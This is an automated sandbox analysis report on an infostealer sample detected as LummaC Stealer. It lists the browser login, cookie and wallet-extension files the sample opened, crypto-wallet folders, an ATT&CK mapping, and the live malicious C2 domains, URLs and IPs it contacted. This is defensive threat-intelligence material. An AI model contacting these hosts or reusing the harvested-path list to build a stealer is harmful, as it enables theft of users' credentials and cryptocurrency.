Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com

File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: Preceding.com	Binary or memory string: WIN_81
Source: Preceding.com	Binary or memory string: WIN_XP
Source: Human.9.dr	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]\|%%\|%[-+ 0#]?([0-9]\|\)?(\.[0-9]\|\.\)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: Preceding.com	Binary or memory string: WIN_XPe
Source: Preceding.com	Binary or memory string: WIN_VISTA
Source: Preceding.com	Binary or memory string: WIN_7
Source: Preceding.com	Binary or memory string: WIN_8

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	Directory queried: C:\Users\user\Documents\LIJDSFKJZG	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	Directory queried: C:\Users\user\Documents\LIJDSFKJZG	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	Directory queried: C:\Users\user\Documents\PWCCAWLGRE	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	Directory queried: C:\Users\user\Documents\PWCCAWLGRE	Jump to behavior

Source: Yara match

File source: Process Memory Space: Preceding.com PID: 3792, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: Process Memory Space: Preceding.com PID: 3792, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	Code function: 13_2_00302263 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		13_2_00302263
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	Code function: 13_2_00301C61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,		13_2_00301C61

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	121 Windows Management Instrumentation	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	2 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Native API	2 Valid Accounts	1 DLL Side-Loading	11 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	41 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 PowerShell	Logon Script (Windows)	2 Valid Accounts	2 Obfuscated Files or Information	Security Account Manager	13 File and Directory Discovery	SMB/Windows Admin Shares	21 Input Capture	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	21 Access Token Manipulation	1 DLL Side-Loading	NTDS	37 System Information Discovery	Distributed Component Object Model	3 Clipboard Data	114 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	12 Process Injection	111 Masquerading	LSA Secrets	231 Security Software Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	2 Valid Accounts	Cached Domain Credentials	21 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	21 Virtualization/Sandbox Evasion	DCSync	4 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	12 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Setup.exe	9%	Virustotal		Browse
Setup.exe	16%	ReversingLabs

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	0%	ReversingLabs

Source	Detection	Scanner	Label
https://enthuasticsa.cyou/api	100%	Avira URL Cloud	malware
https://enthuasticsa.cyou/s	100%	Avira URL Cloud	malware
https://enthuasticsa.cyou/	100%	Avira URL Cloud	malware
https://cegu.shop:443/8574262446/ph.txtelease/key4.dbPK	100%	Avira URL Cloud	malware
grandiouseziu.biz	100%	Avira URL Cloud	malware
truculengisau.biz	100%	Avira URL Cloud	malware
https://cegu.shop/n	100%	Avira URL Cloud	malware
enthuasticsa.cyou	100%	Avira URL Cloud	malware
https://klipgonuh.shop/int_clp_sha.txt	100%	Avira URL Cloud	malware
spookycappy.biz	100%	Avira URL Cloud	malware
https://enthuasticsa.cyou:443/api	100%	Avira URL Cloud	malware
https://enthuasticsa.cyou/pi	100%	Avira URL Cloud	malware
nuttyshopr.biz	100%	Avira URL Cloud	malware
littlenotii.biz	100%	Avira URL Cloud	malware
https://enthuasticsa.cyou:443/apil	100%	Avira URL Cloud	malware
marketlumpe.biz	100%	Avira URL Cloud	malware
fraggielek.biz	100%	Avira URL Cloud	malware
https://klipgonuh.shop/int_clp_sha.txt413	0%	Avira URL Cloud	safe
punishzement.biz	100%	Avira URL Cloud	malware
https://cegu.shop/8574262446/ph.txte	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
cegu.shop	185.161.251.21	true	false	high
enthuasticsa.cyou	188.114.96.3	true	true	unknown
EkmHushSfm.EkmHushSfm	unknown	unknown	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
grandiouseziu.biz	true	Avira URL Cloud: malware	unknown
https://enthuasticsa.cyou/api	true	Avira URL Cloud: malware	unknown
enthuasticsa.cyou	true	Avira URL Cloud: malware	unknown
spookycappy.biz	true	Avira URL Cloud: malware	unknown
truculengisau.biz	true	Avira URL Cloud: malware	unknown
nuttyshopr.biz	true	Avira URL Cloud: malware	unknown
marketlumpe.biz	true	Avira URL Cloud: malware	unknown
littlenotii.biz	true	Avira URL Cloud: malware	unknown
https://cegu.shop/8574262446/ph.txt	false		high
fraggielek.biz	true	Avira URL Cloud: malware	unknown
punishzement.biz	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	Preceding.com, 0000000D.00000003.2659337659.00000000049B7000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	Preceding.com, 0000000D.00000003.2659337659.00000000049B7000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cegu.shop:443/8574262446/ph.txtelease/key4.dbPK	Preceding.com, 0000000D.00000002.4649634757.0000000001766000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://ocsp.entrust.net03	Setup.exe	false		high
http://ocsp.entrust.net02	Setup.exe	false		high
https://enthuasticsa.cyou/	Preceding.com, 0000000D.00000002.4649778438.00000000018D6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://cegu.shop/	Preceding.com, 0000000D.00000002.4649778438.00000000018D6000.00000004.00000020.00020000.00000000.sdmp	false		high
https://dfgh.online/invoker.php?compName=	Preceding.com, 0000000D.00000002.4650275127.0000000004A36000.00000004.00000800.00020000.00000000.sdmp, Preceding.com, 0000000D.00000002.4649778438.00000000018D6000.00000004.00000020.00020000.00000000.sdmp, Preceding.com, 0000000D.00000002.4649778438.000000000183C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	Preceding.com, 0000000D.00000003.2659337659.00000000049B7000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.autoitscript.com/autoit3/	Preceding.com, 0000000D.00000003.2637301145.0000000004EAF000.00000004.00000800.00020000.00000000.sdmp, Preceding.com.2.dr, Enlarge.9.dr	false		high
https://enthuasticsa.cyou/s	Preceding.com, 0000000D.00000002.4649778438.00000000018D6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://x1.c.lencr.org/0	Preceding.com, 0000000D.00000003.2685961924.0000000004984000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	Preceding.com, 0000000D.00000003.2685961924.0000000004984000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	Preceding.com, 0000000D.00000003.2659337659.00000000049B7000.00000004.00000800.00020000.00000000.sdmp	false		high
https://klipgonuh.shop/int_clp_sha.txt	Preceding.com, 0000000D.00000002.4649778438.00000000018D6000.00000004.00000020.00020000.00000000.sdmp, Preceding.com, 0000000D.00000002.4649778438.000000000183C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://crl.entrust.net/ts1ca.crl0	Setup.exe	false		high
https://support.mozilla.org/products/firefoxgro.all	Preceding.com, 0000000D.00000003.2686964944.0000000005AA6000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cegu.shop/n	Preceding.com, 0000000D.00000002.4649778438.00000000018D6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	Preceding.com, 0000000D.00000003.2659337659.00000000049B7000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.entrust.net/rpa03	Setup.exe	false		high
https://enthuasticsa.cyou:443/apil	Preceding.com, 0000000D.00000002.4649634757.0000000001766000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://enthuasticsa.cyou/pi	Preceding.com, 0000000D.00000002.4650275127.0000000004A2A000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://aia.entrust.net/ts1-chain256.cer01	Setup.exe	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	Preceding.com, 0000000D.00000003.2659337659.00000000049B7000.00000004.00000800.00020000.00000000.sdmp	false		high
https://klipgonuh.shop/int_clp_sha.txt413	Preceding.com, 0000000D.00000002.4649778438.000000000183C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.rootca1.amazontrust.com/rootca1.crl0	Preceding.com, 0000000D.00000003.2685961924.0000000004984000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.autoitscript.com/autoit3/X	Preceding.com, 0000000D.00000000.2239356108.0000000000355000.00000002.00000001.01000000.00000007.sdmp, Preceding.com, 0000000D.00000003.2637301145.0000000004EAF000.00000004.00000800.00020000.00000000.sdmp, Preceding.com.2.dr, Enlarge.9.dr	false		high
http://ocsp.rootca1.amazontrust.com0:	Preceding.com, 0000000D.00000003.2685961924.0000000004984000.00000004.00000800.00020000.00000000.sdmp	false		high
http://nsis.sf.net/NSIS_ErrorError	Setup.exe	false		high
https://www.ecosia.org/newtab/	Preceding.com, 0000000D.00000003.2659337659.00000000049B7000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	Preceding.com, 0000000D.00000003.2686964944.0000000005AA6000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	Preceding.com, 0000000D.00000003.2659337659.00000000049B7000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crt.rootca1.amazontrust.com/rootca1.cer0?	Preceding.com, 0000000D.00000003.2685961924.0000000004984000.00000004.00000800.00020000.00000000.sdmp	false		high
https://enthuasticsa.cyou:443/api	Preceding.com, 0000000D.00000002.4649634757.0000000001766000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://cegu.shop/8574262446/ph.txte	Preceding.com, 0000000D.00000002.4649778438.00000000018D6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	Preceding.com, 0000000D.00000003.2659337659.00000000049B7000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.entrust.net/2048ca.crl0	Setup.exe	false		high
https://www.entrust.net/rpa0	Setup.exe	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
188.114.96.3	enthuasticsa.cyou	European Union		13335	CLOUDFLARENETUS	true
185.161.251.21	cegu.shop	United Kingdom		5089	NTLGB	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1588291
Start date and time:	2025-01-10 23:35:42 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 42s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	17
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Setup.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@26/22@3/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 98% Number of executed functions: 82 Number of non-executed functions: 299
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 13.107.246.45, 20.12.23.50
Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
17:36:41	API Interceptor	1x Sleep call for process: Setup.exe modified
17:37:19	API Interceptor	13x Sleep call for process: Preceding.com modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
188.114.96.3	M7XS5C07kV.exe	Get hash	malicious	FormBook	Browse	www.zkdamdjj.shop/kf1m/
	https://cocteldedeas.mx/rx567#cmVjaWJhc2VAc2VhbWFyaXRpbWEuY29t	Get hash	malicious	HTMLPhisher	Browse	cocteldedeas.mx/rx567/
	ofZiNLLKZU.exe	Get hash	malicious	FormBook	Browse	www.zrichiod-riech.sbs/kf10/
	KcSzB2IpP5.exe	Get hash	malicious	FormBook	Browse	www.cifasnc.info/9kxb/?SDC=3P5Gm1XciD5wQdS+7olugPzxqsRcbkm2h5Eq/rLsNh2+B342K587ak9zFSbTb4g5MvE40jzEqyGLe8su/vgeQxV3BBvpqLfi5EtkufMqD+H/d+eq3w==&mH=CpePy0P
	1162-201.exe	Get hash	malicious	FormBook	Browse	www.einpisalpace.shop/pgw3/
